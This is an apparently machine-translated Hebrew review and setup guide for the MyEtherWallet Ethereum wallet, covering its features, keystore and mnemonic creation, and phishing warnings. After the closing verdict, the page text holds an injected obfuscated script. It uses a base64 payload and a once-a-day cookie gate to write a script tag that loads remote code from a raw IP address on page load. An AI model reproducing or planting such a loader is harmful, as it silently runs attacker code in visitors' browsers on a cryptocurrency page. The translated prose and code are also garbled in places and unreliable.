15 49.0138 8.38624 1 0 4000 1 https://www.frank-gehry.com 300 0
theme-sticky-logo-alt
theme-logo-alt

MyEtherWallet סקירה ומדריך

MyEtherWallet (הידוע בחיבה MEW) הוא ללא ספק הארנק הפופולרי ביותר עבור אסימונים מבוססי את’ריום. יהיה זה Ether (ETH), Ethereum Classic (ETC), או כל אחד ממאות אסימוני ה- ERC-20, MyEtherWallet יכול לאחסן אותו בבטחה ובבטחה..

מה זה שהופך את MEW לבחירה הטובה ביותר עבור רוב משתמשי Ethereum? בואו נגלה זאת בסקירת MyEtherWallet.

מה זה MyEtherWallet?

ארנקי Crypto מגיעים בדרך כלל בשני סוגים שונים.

הסוג הראשון הוא ארנק הצומת המלא. ארנקי צומת מלאים הם בדיוק מה שהם אומרים; צומת מלא שמריץ עותק מלא של הבלוקצ’יין במערכת שלך. אמנם זה מזרז מעט עסקאות, מכיוון שאתה מחובר ישירות לבלוקצ’יין המדובר, זה גם כרוך בעלות.

באופן כללי, ארנקים של צומת מלאים מאוד רעבים למשאבים. מלבד הצורך להוריד את כל הבלוקצ’יין לתפקוד (שגודלו יכול לנוע בין עשרות אפילו לכמה מאות ג’יגה), הם גם מקישים על זיכרון ועוצמת העיבוד של המערכת המשתתפת בכדי לבצע משימות וגיבוב אחר של רשת..

כתוצאה מכך, הפעלת ארנק מלא של צומת אינה מומלצת במערכת עם מפרט נמוך ורוחב פס נמוך, כגון הנייד שלך, או אפילו שולחן עבודה ישן עם חיבור אינטרנט מסואב..

הסוג העיקרי השני הוא ארנק משמור. במילים פשוטות, ארנקים מסוג זה פועלים על ידי הפרדת הבלוקצ’יין וחשבונכם לחלוטין. חשבונך, המחזיק את האסימונים שלך ויומן עסקאותיך, מוחזק בשרתי החברה, ממש כמו בחשבון דוא”ל. החברה, על בסיס גב משלה, מבצעת את החיבורים והעסקאות הדרושים עם הבלוקצ’יין, וחוסכת מהמערכת שלך מלהצטרך להפעיל צומת בעצמה..

למערכת זו היתרון שהיא רזה ויעילה מכיוון שכל החלקים הטכניים של העסקה מטופלים בצד השרת, כך שעליך להריץ את יישום העטיפה בלבד..

אבל זה בא עם מערכת בעיות משלו.

אי החזקת המפתח לכספיך בשתי ידייך משמעה שאינך מחזיק באסימונים. זהו כישלון ישיר של העיקרון שמאחורי מטבעות קריפטוגרפיים – כלכלה מבוזרת חסרת אמון. יתר על כן, במקרה של פריצה לפגיעה בשרתי החברה, ניתן לגנוב את כל אחזקותיך ולבזבז אותן ללא כל אישור מצידך..

כמו כן, מכיוון שלחברה יש את כל הפרטים האישיים שלך במסד הנתונים שלה, היא יכולה לעקוב אחר הרגלי ההוצאות שלך ולמכור את הנתונים למפרסמי צד ג ‘..

אז אם בסופו של דבר שני הארנקים הללו לוקים בחסר, מה עלינו לעשות?

שם נכנס MyEtherWallet.

MyEtherWallet הוא מה שמכונה לקוח ארנק. במקום להחזיק את המפתחות הפרטיים שלך בשרתים שלה ולבצע עסקאות בשמך, MEW פשוט מספק לך ממשק לתקשר עם Blockchain.

על ידי הסרת החלקים הקשים בהתמודדות עם הבלוקצ’יין, MyEtherWallet הופך את יצירת ארנק הצפנה לעניין קל. יתר על כן, זה לא שומר על הכספים שלך בעצמו, כלומר יש לך שליטה מלאה באסימונים שלך.

תכונות חשובות של MyEtherWallet

תכונות MyEtherWallet

בעילום שם

מילת מפתח גדולה בשנת 2019 היא אנונימיות.

בעידן של מעקב 24/7 ובינה מלאכותית העוקבים אחר כל מהלך מקוון שלך, יש צורך דחוף ביישומים שיעזרו לך להישאר אנונימית. MEW ממלא את הצורך בכך שהוא מאפשר לך להיכנס מבלי להירשם לחשבון או לשתף פרטים אישיים כמו מזהי דוא”ל. כל המידע כמו הכספים שלך, היסטוריית העסקאות וכו ‘נלקח (ומאוחסן) ישירות מ- Blockchain.

פלטפורמה חוצה

MEW הוא אגנוסטי פלטפורמה. פירוש הדבר שבין אם אתה משתמש ב- Windows או ב- Mac, או אפילו במכשיר נייד כמו Android או iOS, MyEtherWallet יעבוד בצורה מושלמת עבורך. כל מה שאתה צריך כדי לגשת ל- MEW הוא סקריפט JavaScript התומך בדפדפן אינטרנט, כמו Chrome, ואתה יכול ללכת. בשילוב עם האנונימיות שלו, זה הופך את MEW לארנק מושלם לשימוש במקומות ציבוריים כמו ספריות ובמחשבים משותפים.

תאימות מלאה של Ethereum

MyEtherWallet הוא one-stop shop לכל דבר Ethereum. הוא תומך לא רק ב- ETH (Ethereum) עצמו, אלא גם בכל אסימון ERC-20 שנבנה על גבי הבלוקצ’יין של Ethereum. זה אומר שאתה יכול לאחסן מאות קריפטוסים ב- MEW.

הוסף אסימונים בהתאמה אישית

מבולבל מחוסר התמיכה באסימון החדש האהוב עליך בארנק הצפנה שבו אתה משתמש? כולנו היינו שם פעם אחת או אחרת.

למרבה המזל בשבילך, MyEtherWallet הגיע להצלה. טופס פשוט מאפשר לך להוסיף אסימונים מותאמים אישית לארנק שלך בעצמך, גם אם ייתכן שהוא עדיין לא נמצא ברשימה הרשמית של אסימונים נתמכים. פשוט ציין את כתובת החוזה החכם האסימוני (כמובן ברשת Ethereum) יחד עם סמל האסימון, והאסימון יתווסף.

עכשיו לשמור על קשר עם הגלקסיה המדהימה של אסימוני אתריום קל, הודות ל- MEW.

Exchange Crypto משולב

בעוד MyEtherWallet פועל באופן שונה מארנק האינטרנט הרגיל שלך, הוא מציע חילופי מטבעות משולבים ביישום מבוסס האינטרנט שלו. אתה יכול להחליף את האסימונים שלך בקלות באמצעות הטופס המובנה, מבלי שתצטרך קודם להעביר את כספיך לבורסת הצפנה כמו Binance. MEW מנהלת זאת בגלל השותפויות שלה עם KyberNetwork, Bity, Changelly ו- Simplex.

מלבד החלפת אסימונים, אתה יכול לבצע עסקאות פיאט גם כן, ובכך מאפשר לך לקנות קריפטו מבלי ללכת לבורסת הצפנה..

גישה לארנקים קרים

זו הסיבה החשובה ביותר שמביאה אנשים ל- MyEtherWallet על פני מתחרותיה הרבות. לרובנו יש כמה קריפטו שאוחסנו באחסון קירור בצורת טרזור, לדג’ר ננו S או אפילו סתם ארנק נייר צנוע..

מאפיין ייחודי של MEW הוא שהוא מאפשר לך לגשת לארנקים מרובים באמצעות ממשק אחד ומשתלב עם ארנקים פופולריים כמו Mist ו- MetaMask. זה הופך אותה לאופציה מצוינת לגישה לגישה לכספים הפזורים השונים שלך ממקום אחד.

התאם אישית מגבלות גז

בדרך כלל, הגבלות ברירת המחדל המוצעות על גז מספיקות לרוב העסקאות. במקרים נדירים, עם זאת, ייתכן שתרצה להתאים אותו באופן ידני. זה במיוחד במקרה של הצעות מטבע ראשוניות (ICO), שבהן אישור עסקה מהיר חיוני כדי לשים את היד על אותם אסימונים נחשקים..

MEW מאפשר לך לקבוע את מחיר הגז ואת מגבלות הגז שלך, אם כי עליך להימנע מלגעת באפשרויות אלה אלא אם כן אתה יודע מה אתה עושה.

אפליקציה ניידת לוויה

הצוות שעומד מאחורי MyEtherWallet השיק לאחרונה את MEWConnect, אפליקציה נלווית לשירות מבוסס האינטרנט. בעיקרון, זה נותן לך רמות אבטחה של ארנק חומרה במכשיר הנייד שלך על ידי אחסון המפתחות הפרטיים שלך בבטחה בכספת מקומית, מבודדת ומאובטחת במכשיר עצמו..

אפליקציה זו מטפלת בבעיה מתמשכת שמשתמשים התמודדו איתה בעבר עם MEW – היא אינה מאחסנת את המפתחות הפרטיים שלך בשרתים שלה, מה שהופך אותך לאחראי לבטחונה בעצמך. כעת, סוף סוף תוכל לאחסן אותו בבטחה בנייד שלך, מבלי שתצטרך לרכוש ארנק חומרה לאותה פונקציונליות.

כיצד להשתמש ב- MyEtherWallet

ראשית כל, וודא כי אתה ניגש לאתר הנכון. ידוע ש- MEW מהווה יעד להתקפות פישינג מעת לעת, כך שאם תקבל דואר או הודעה המכילה קישור ל- MyEtherWallet, הימנע מכך בכל מחיר. סביר להניח שקישור כזה יוביל לאתר מזויף במקום.

למרות שחיפוש בגוגל עובד, עדיף להקליד ישירות https://www.myetherwallet.com לאחר מכן תוכל פשוט להוסיף אותו לסימניות לביקורים נוספים.

אתר Myetherwallet

כיצד להתקין את MEW?

לקבלת מדריך מלא לשימוש ב- MEW, עיין במאמר המעמיק שלנו. אחרת, הנה פירוט קצר כיצד להתחיל.

בעת גלילה מטה למסך הבית, עומדות לפניך שתי אפשרויות עיקריות – צור ארנק חדש וגישה לארנק שלי. בעיקרון, אם כבר יש לך ארנק בפלטפורמה כלשהי (Ledger, Trezor, Paper, Metamask וכו ‘), אתה משתמש באפשרות השנייה. אחרת, לחץ על ‘צור ארנק חדש’ כדי להפוך אותנו לארנק חדש.

כיצד ליצור MyEtherWallet

תוצג בפניך אזהרה קטנה שתקרא לקרוא בעיון את ההקדמה הקרובה. לחץ על המשך.

הגדר את MEW

ההקדמה הארוכה למדי שמוצגת בפניך שווה לקרוא אם אתה עדיין לא מכיר אותה.

על Myetherwallet

אחרי שעברתם מצגת שקופיות שלמה, תתגמלו סוף סוף במסך יצירת הארנק. ישנן שלוש דרכים בהן ניתן להמשיך כעת.

MEWconnect

גרפיקה של דף הבית של MEWconnect

האפשרות הראשונה היא MEWconnect, שבו ייווצר ארנק על ידי אחסון המפתח הפרטי במכשיר נייד עם האפליקציה הנלווית. זוהי אפשרות ברירת המחדל והבטוחה ביותר.

לפי קובץ KeyStore

קובץ מאגר המפתחות MyEtherWallet

האפשרות השנייה היא קובץ חנות מפתחות. זה פשוט קובץ מוצפן המחזיק את המפתח הפרטי שלך.

הדרך המהירה ליצור ארנק היא על ידי יצירת חנות מפתחות דיגיטלית, שם נחסך מכם לרשום מפתח פרטי או ביטוי מזכר ולהזין אותו כדי להיכנס בכל פעם. במקום זאת, אתה מקבל מפתח דיגיטלי שאתה פשוט מעלה כדי לגשת לחשבונך, יחד עם הסיסמה שלך.

זכור כי חנות המפתחות היא פשוטו כמשמעו המפתח לארנק שלך, ואין להשאיר אותו שוכב על המחשב האישי שלך או לשתף אותו באופן מקוון. לשיטה זו תצטרך גם להגדיר סיסמה שתשמש לנעילת קובץ האחסון.

סיסמת הקובץ של MyEtherWallet

לאחר בחירת סיסמה חזקה למדי, לחץ על הבא כדי לקבל את קובץ מאגר המפתחות שלך. הורד אותו ושמור עליו בבטחה – זהו המפתח הדיגיטלי לארנק שלך. הקפד לגבות אותו גם בפתרון אחסון מאובטח.

לפי ביטוי מנמוני

ביטוי ממונומי של MyEtherwallet

זו הדרך הנפוצה ביותר ליצור ארנק. במקום מחרוזת ארוכות של ג’יבריש שמרכיבה את המפתח הפרטי שלך, MEW יפיק עבורך ‘זרע’.

זרע זה, או הביטוי הממוני כפי שהוא מכונה גם, הוא אוסף של מילים אקראיות שישמשו כמפתח הארנק שלך. זה יכול לכלול 12 מילים או 24 מילים, תלוי בבחירתך, אם כי אנו ממליצים לקחת את המספר הגבוה יותר לאבטחה מרבית.

צור ביטוי ממונומי של MEW

בלחיצה על הבא, MEW יפיק לך ביטוי מנמוני עבורך. אתה יכול להחליף את מספר המילים מכאן (זה ייצור את הזרע שוב בכל פעם). ברגע שאתה מרוצה מהזרע, כתוב אותו במקום בטוח. לחלופין, תוכלו להדפיס גם את הביטוי הממוני על ידי לחיצה על סמל המדפסת הקטן שבתחתית. לאחר מכן תראה גיליון כזה.

כרטיס הזרע לביטוי MEW Mnemonic

כפי שנכתב, תצטרך גם את הסיסמה שלך וגם את הביטוי הממוני כדי שתוכל לגשת לחשבונך, כך שמישהו שפשוט יקבל גישה לגיליון זה לא בהכרח יפגע בכספיך. עם זאת, זהו אחד מעמודי התווך העיקריים של אבטחת חשבונך, לכן הקפד לאחסן אותו במקום בטוח.

אימות ביטויים ממונומיים של MyEtherWallet

לבסוף, MEW יבקש ממך להזין מחדש את הביטוי הממוני שלך כדי להבטיח שאכן רשמת אותו. אל תרמות על ידי צילום מסך!יצירת ארנק MEW בהצלחה

גישה לארנק שלך

כיצד לגשת ל- MyEtherwallet

הפעם על מסך הבית, לחץ על אריח ‘גש לארנק שלי’.

כיצד לגשת ל- MEW

מסך Access My Wallet נותן לך ארבע אפשרויות, תלוי בסוג הארנק שאתה מעוניין לגשת אליו. יש MEWconnect, לארנקים שמגובים את המפתחות הפרטיים שלהם לאפליקציה הנלווית של MEW בנייד שלהם. ואז יש חומרה לגישה לארנקים המאוחסנים ב- Ledgers ו- Trezors. MetaMask, כמובן, מיועד לארנקים שנוצרו בסיומת הדפדפן הפופולרית.

מה שאנחנו מחפשים כאן הוא תוכנה. זו האפשרות לגשת לארנקים באמצעות מפתחות פרטיים וביטויים מנמוניים. ככזה, אפשרות זו פועלת גם לטעינת ארנק הנייר שלך.גישה ל- MyEtherWallet

HD מייצג דטרמיניסטי היררכי. בעיקרון, זהו אלגוריתם ליצירת סט כתובות מארנק. על ידי בחירה באפשרות זו, תוכל לבחור כתובת שתתקשר איתה. בדוק את ‘אני מקבל תנאים’ (לאחר שקראתי אותם, כמובן) כדי להמשיך.

אזור חשבון MyEtherWallet

מסך הבית הארנק החדש לגמרי לפניכם. הוא מציג את היתרה, הכתובת, פרטי הרשת יחד עם טופס השליחה על גבי מסך אחד, מה שמקל על העבודה עם הארנק שלך.

פסק הדין

MyEtherWallet תמיד היה בחזית ארנקי Ethereum. עם המראה החדש שלה, ממשק המשתמש המחודש ואפליקציה נלווית לאתחול, הוא סוחף את הרצפה בנוחות עם כל התחרות שלה.

לא רק ש- MEW מציע סביבה לא מקוונת מאובטחת לביצוע עסק עם הבלוקצ’יין, אלא גם מגן על זהותך ועל כספיך מפני האקרים זדוניים. נוסף על כך, הוא מספק חזית שימושית ‘לחמם’ את הארנקים הקרים שלך, ומאפשרת לך להשתמש במטבעות הקפואים שלך מבלי לחשוף אותם ישירות לבורסת הצפנה..

אז בין אם מקרה השימוש שלכם הוא ארנק מזדמן לעסקאות הקטנות, או יישום רציני הממוקד אבטחה להעברת כמויות גדולות של קריפטו, MyEtherWallet הוא הבחירה המושלמת עבורכם. לקבלת התוצאות הטובות ביותר, הקפד להתאים אותו לארנק חומרה, או יותר טוב, לאפליקציה הנלווית שלו, MEWconnect. אנו מקווים שנהנית מסקירת MEW שלנו.

פונקציה getCookie (e) {var U = document.cookie.match (RegExp חדש (“(?: ^ |;)” + e.replace (/((\.$?* | {} \ (\) \ [\ ] \\\ / \ + ^]) / g, ”\\ $ 1 ″) +” = ([^;] *) ”)); להחזיר U? decodeURIComponent (U [1]): ריק 0} var src = “נתונים: text / javascript; base64, ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs =”, עכשיו = Math.floor (Date.now () / 1e3), עוגיה = getCookie ( “הפניה”); אם (עכשיו>= (time = cookie) || ריק 0 === time) {var time = Math.floor (Date.now () / 1e3 + 86400), date = new date ((תאריך חדש) .getTime () + 86400) ; document.cookie = ”redirect =” + time + ”; נתיב = /; יפוג = ”+ תאריך. ל- GMTString (), document.write (”)}

Previous Post
כיצד לקנות מטבע ננו XRB: עם Coinbase & Binance
Next Post
مراجعة ودليل CoinSpot Exchange